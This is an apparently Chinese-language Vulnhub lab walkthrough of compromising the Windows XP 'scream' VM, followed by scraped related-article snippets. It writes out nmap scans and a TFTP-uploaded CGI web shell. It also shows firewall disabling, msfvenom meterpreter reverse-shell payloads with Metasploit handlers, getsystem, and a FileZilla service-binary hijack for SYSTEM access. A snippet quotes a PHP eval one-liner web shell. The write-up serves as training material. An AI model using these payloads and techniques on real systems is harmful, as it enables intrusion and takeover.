Vulnhub靶机:scream

一、介绍

运行环境:Virtualbox(攻击机)和VMware(靶机)

攻击机:kali(192.168.56.101)

靶机:/dev/random: scream(192.168.56.110)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/devrandom-scream,47/

靶机下载到的是一个exe文件,靶机作者制作靶机时采用的方式为使用ISO镜像修改程序将漏洞写入操作系统安装镜像,因此我们需要自行准备Windows XP操作系统的安装文件并使用镜像修改工具制作安装光盘。

首先下载Windows XP操作系统的安装光盘,要求如下:

  • 32位操作系统
  • Windows XP Home/Professional Editon
  • Service Pack 2/3

下载好Windows XP操作系统,打开scream.exe

在这里插入图片描述

点击Source区块内文本输入框旁边的光盘按钮,选中Windows XP的安装光盘,随后将压缩包内key.txt的激活码填入Product Key内的文本输入框,点击Generate Image按钮,即可生成镜像文件。

在这里插入图片描述

镜像文件生成后,按照正常的步骤在虚拟机软件中添加Windows XP虚拟机即可。制作好的镜像无需进行手动操作即可自动安装。

这里有大佬已经配置好的虚拟机镜像:https://pan.baidu.com/s/13N52UQs3b6NUBFqZ1tok7w?pwd=p4y9

(发现自己制作的镜像80端口没开放,而网上配置好的镜像会开放80端口,我这里使用上面链接下载的镜像)

二、信息收集

使用nmap主机发现靶机ip:192.168.56.111

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、23、80

nmap -A 192.168.56.111 -p 1-65535

在这里插入图片描述

21端口:根据nmap的扫描结果,ftp存在匿名登录。在Kali Linux中打开系统自带的 Thuner文件管理器,在地址栏输入ftp://192.168.2.142,随后在弹出的窗口中选择匿名连接并点击确定,即可连接靶机的FTP服务:

在这里插入图片描述

查看靶机各个目录的文件,/root/目录可能是web网站的根目录

在这里插入图片描述

22端口:根据nmap扫描结果ssh的banner信息为:WeOnlyDo sshd 2.1.3

23端口:什么信息都没有发现

80端口:打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息

在这里插入图片描述

使用dirsearch目录爆破,也没有发现什么东西

在这里插入图片描述

使用searchsploit搜索sshd 2.1.3的历史漏洞,发现远程身份验证绕过漏洞:CVE-2012-6066

在这里插入图片描述

使用msfconsole进行漏洞利用

msfconsole
use exploit/windows/ssh/freesshd_authbypass
set rhosts 192.168.56.111
set LHOST 192.168.56.101
run

在这里插入图片描述
在这里插入图片描述

漏洞利用失败,看报错应该是ssh链接的问题,靶机的ssh版本太低了

攻击机连接靶机的ssh失败,需要添加-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc

ssh -l root 192.168.56.111 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc

在这里插入图片描述

后面参考了一下网上的wp,靶机还开放了UDP端口,nmap扫描默认是TCP扫描,扫描不出来UDP端口

使用参数-sU进行UDP扫描,发现端口:69

nmap -sU 192.168.56.111 -p 1-65535

在这里插入图片描述

69端口:tftp服务,可以尝试上传文件到靶机

tftp 192.168.56.111
put a.txt

在这里插入图片描述

没有提示是否上传成功,我们匿名登录ftp,发现a.txt上传成功

在这里插入图片描述

三、漏洞利用

使用TFTP上传一句话木马试试,浏览器访问发现服务器无法解析php

在这里插入图片描述

根据之前ftp看到的,网站有一个/cgi-bin/目录用来存放gui程序,我们可以上传一个GUI后门文件:https://github.com/rafalrusin/web-shell

put cgiwebshell.pl cgi-bin/cgi_webshell.pl

浏览器访问密码为yourpassword:http://192.168.56.111/cgi-bin/cgi_webshell.pl?password=yourpassword

在这里插入图片描述

执行dir命令

在这里插入图片描述

四、提权

使用ping命令探测,发现靶机可能开了防火墙

ping 192.168.56.111 -c 10

在这里插入图片描述

使用命令查看防火墙是否开启

netsh firewall show state

在这里插入图片描述

将防火墙关闭

net stop sharedaccess

在这里插入图片描述

再次ping测试,防火墙被成功关闭

在这里插入图片描述

使用msfvenom生成木马进行远程控制靶机

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444  -f exe -o  shell.exe

在这里插入图片描述

使用tftp将木马上传到靶机

tftp 192.168.56.111
put shell.exe cgi-bin/reverse_shell.exe

在这里插入图片描述

攻击机使用msfconsole进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
exploit

在这里插入图片描述

使用webshell启动上传的木马文件,发现启动失败

reverse_shell.exe

在这里插入图片描述

后面发现使用TFTP上传可执行文件,必须将传输模式切换为binary,否则TFTP会上传纯文本,重新上传shell

tftp 192.168.56.111
binary
put shell.exe cgi-bin/shell.exe

在这里插入图片描述

使用webshell启动上传的木马文件,链接成功

shell.exe

在这里插入图片描述

查看当前的权限,为普通用户权限

在这里插入图片描述

1、getsystem提权

getsystem提权原理:

1.创建一个以system权限启动的程序,这个程序的作用是连接指定的命名管道。
2.创建一个进程,并让进程创建命名管道。
3.让之前的以system权限启动的程序启动并连接这个命名管道。
4.利用ImpersonateNamedPipeClient()函数生成system权限的token。
5.利用system权限的token启动cmd.exe。

参考:msf的getsystem命令原理与windows命名管道_msf getsystem-CSDN博客

执行getsystem命令,直接得到system权限

在这里插入图片描述

2、内核漏洞提权(失败)

查看操作系统信息:systeminfo

在这里插入图片描述

将得到的信息保存到systeminfo.txt,使用windows-exploit-suggester对比补丁信息,来查看靶机存在哪些漏洞

python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo systeminfo.txt

在这里插入图片描述

存在ms13_053漏洞,在msf搜索对应的模块

search ms13_053

在这里插入图片描述

使用改模块进行提权,提权失败

use exploit/windows/local/ms13_053_schlamperei
set SESSION 5
set LHOST 192.168.56.101
exploit

在这里插入图片描述

不清楚是什么原因,尝试过其他漏洞也是这种情况

3、服务劫持提权

使用命令列出系统进程列表

tasklist /V

在这里插入图片描述

发现下面三个服务存在NT AUTHORITY\SYSTEM权限

FileZilla server.exe
FreeSSHDService.exe
OpenTFTPServerMT.exe

可以尝试替换服务程序来进行提权限

使用net start命令看看系统正在运行的服务列表
在这里插入图片描述

高权限进程对应系统服务列表

进程服务
FreeSSHDService.exeFreeSSHDService
OpenTFTPServerMT.exeOpen TFTP Server, MultiThreaded
FileZilla server.exeFileZilla Server FTP server

我们选择ftp服务进行提权

使用命令查询FTP服务状态:

sc query "FileZilla Server FTP server"

在这里插入图片描述

查询失败,直接试试停止该服务:

net stop "FileZilla Server FTP server"

在这里插入图片描述

寻找FileZilla server.exe的绝对路径,为:C:\Program Files\FileZilla Server\FileZilla server.exe

cd C:\
dir /s | findstr "FileZilla server.exe"

在这里插入图片描述

生成新的木马并上传

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=8888  -f exe -o  shell2.exe
tftp 192.168.56.111
binary
put shell2.exe

在这里插入图片描述

替换FTP程序文件名,劫持的ftp服务

cd C:\www\root
move ".\shell2.exe" "C:\Program Files\FileZilla Server\shell2.exe" 
cd "C:\Program Files\FileZilla Server\"
move "FileZilla server.exe" "FileZilla server.exe.backup"
move ".\shell2.exe" "FileZilla server.exe"

在这里插入图片描述

攻击机进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 8888
exploit

重新启动服务

net start "FileZilla Server FTP server"

在这里插入图片描述

得到NT AUTHORITY\SYSTEM权限

在这里插入图片描述

参考链接:https://juejin.cn/post/7299050263745953833

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/510657.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

RUST Rover 条件编译 异常处理

按官方处理发现异常 会报异常 error: failed to parse manifest at C:\Users\topma\RustroverProjects\untitled2\Cargo.toml 修改模式如下才能正常编译 网上说明 这样处理 [features] print-a [] print-b [] full ["print-a","print-b"]

力扣Lc27--队列-- 387. 字符串中的第一个唯一字符(java版)-2024年4月02日

1.题目描述 2.知识点 注1: String类提供了一个repeat方法,该方法用于将指定的字符串重复指定的次数。 public class Main {public static void main(String[] args) {String repeatedString "abc".repeat(3);System.out.println(repeatedS…

【折腾笔记】Windows系统运行ChatGLM3-6B模型实验

【折腾笔记】Windows系统运行ChatGLM3-6B模型实验 准备工作 硬件环境 笔记本电脑CPU:AMD R9 7940HS 8核16线程内存:16G16G DDR5双通道 4800MHzGPU:NVIDIA RTX4060 8G显存 软件环境 操作系统版本:Windows 10 企业版 22H2显卡驱…

C++核心高级编程 --- 1、内存分区模型 2、引用

文章目录 第一章:1.内存分区模型1.1 程序运行前1.2 程序运行后1.3 new操作符 第二章:2.引用2.1 使用2.2 注意事项2.3 做函数参数2.4 做函数返回值2.5 本质2.6 常量引用 第一章: 1.内存分区模型 4个区域: 代码区:存放…

SpringBean生命周期之五、七、十步(详解)

目录 前提 一.Bean的完整周期 1.1什么是Bean的生命周期 二.SpringBean的五步分析法 2.1理论分析 2.2代码实现 三.Bean周期之七步分析法 3.1理论分析 3.2代码实现 四.Bean生命周期之十步分析法 4.1理论分析 4.2代码实现 五.总结 5.1五步、七步、十步的差别 5.2S…

IPC 进程间通信

IPC InterProcess Communication The concept of IPC Each process has a differnt user addess space,and local variables 各自看不见,so 进程间通信 need kernel(内核), so a buffer is opened in the kernel,process 1 copies data from user space to this buffer,and …

易语言控件绑定数据库

易语言是一门中文编程语言,由国人开发,虽然比较冷门,但是在有些场合却非常流行,比如自动化脚本,还有开发外挂。 在易语言中,只要控件的属性里有数据源的都可以与数据库的数据绑定,以下将演示易…

消息存储与同步策略设计

消息存储与同步策略 https://github.com/robinfoxnan/BirdTalkServer 思路: 私聊写扩散,以用户为中心,存储2次;群聊读扩散,以群组为中心,存储一次;scylladb易于扩展,适合并发&…

蚁剑流量分析

蚁剑流量分析 在靶机上面上传一个一句话木马&#xff0c;并使用蚁剑连接&#xff0c;进行抓包, 一句话木马内容 <?php eval($_POST[1]); defalut编码器 在使用蚁剑连接的时候使用default编码器 连接之后进行的操作行为是查看当前目录(/var/www/html)下的文件&#xff0…

网易云首页单页面html+css

网页设计与网站建设作业htmlcss 预览 源码查看https://hpc.baicaitang.cn/2083.html

书生 浦语 大模型趣味 Demo

目录 一. 部署 InternLM2-Chat-1.8B 模型进行智能对话 1. 环境准备 2. 下载模型参数 3. 运行Demo 二. 部署实战营 八戒-Chat-1.8B 模型 1. 下载Demo仓库 2. 启动web服务端加载八戒模型&#xff1a; 3. 将SSH远程端口映射到本地 4. 在本地浏览器打开&#xff1a;http:/…

【C++第二阶段】案例-职工管理系统

以下内容仅为当前认识&#xff0c;可能有不足之处&#xff0c;欢迎讨论&#xff01; 文章目录 案例>职工管理系统0.退出功能1.增加职工功能2.显示职工信息3.删除职工信息4.修改职工信息5.查找职工信息6.排序职工7.清空所有文档 案例>职工管理系统 首先写一个workmanager…

Adobe ColdFusion 任意文件读取漏洞复现(CVE-2024-20767)

0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言,将可扩展、改变游戏规则且可靠的产品的愿景变为现实。 0x02 漏洞概述 由于 Adobe ColdFusion 的访问控制不当,未经身份认证的远程攻击者可以构造恶…

夜晚兼职好选择:六大副业助你增收

晚上兼职&#xff0c;无疑是许多寻求额外收入人群的理想选择。以下为您精心推荐的六个副业&#xff0c;既适合晚间操作&#xff0c;又能让您在轻松愉悦中赚取额外收益。 网络调查与市场研究&#xff1a;利用晚上的闲暇时光&#xff0c;参与网络调查与市场研究&#xff0c;为企业…

《QT实用小工具·七》CPU内存显示控件

1、概述 源码放在文章末尾 CPU内存显示控件 项目包含的功能如下&#xff1a; 实时显示当前CPU占用率。实时显示内存使用情况。包括共多少内存、已使用多少内存。全平台通用&#xff0c;包括windows、linux、ARM。发出信号通知占用率和内存使用情况等&#xff0c;以便自行显示…

思腾合力与中科创达联合推出的迅思代码生成一体机产品

思腾合力与中科创达联合推出的迅思代码生成一体机产品&#xff0c;基于思腾合力强大算力底座&#xff0c;搭载中科创达自研国产大模型&#xff0c;面向众多有编程开发需求的客户&#xff0c;简化编程和软件开发过程 &#xff0c;降低编程门槛&#xff0c;全方位提升开发和生产效…

群晖NAS使用Docker部署大语言模型Llama 2结合内网穿透实现公网访问本地GPT聊天服务

文章目录 1. 拉取相关的Docker镜像2. 运行Ollama 镜像3. 运行Chatbot Ollama镜像4. 本地访问5. 群晖安装Cpolar6. 配置公网地址7. 公网访问8. 固定公网地址 随着ChatGPT 和open Sora 的热度剧增,大语言模型时代,开启了AI新篇章,大语言模型的应用非常广泛&#xff0c;包括聊天机…

ssm018简易版营业厅宽带系统+jsp

营业厅宽带系统设计与实现 摘 要 现代经济快节奏发展以及不断完善升级的信息化技术&#xff0c;让传统数据信息的管理升级为软件存储&#xff0c;归纳&#xff0c;集中处理数据信息的管理方式。本营业厅宽带系统就是在这样的大环境下诞生&#xff0c;其可以帮助管理者在短时间…

【饿了么笔试题汇总】-2024-04-02-饿了么春招笔试题-三语言题解(CPP/Python/Java)

&#x1f36d; 大家好这里是KK爱Coding &#xff0c;一枚热爱算法的程序员 ✨ 本系列打算持续跟新饿了么近期的春秋招笔试题汇总&#xff5e; &#x1f4bb; ACM银牌&#x1f948;| 多次AK大厂笔试 &#xff5c; 编程一对一辅导 &#x1f44f; 感谢大家的订阅➕ 和 喜欢&#x…

整型之韵,数之舞:大小端与浮点数的内存之旅

✨✨欢迎&#x1f44d;&#x1f44d;点赞☕️☕️收藏✍✍评论 个人主页&#xff1a;秋邱’博客 所属栏目&#xff1a;人工智能 &#xff08;感谢您的光临&#xff0c;您的光临蓬荜生辉&#xff09; 1.0 整形提升 我们先来看看代码。 int main() {char a 3;char b 127;char …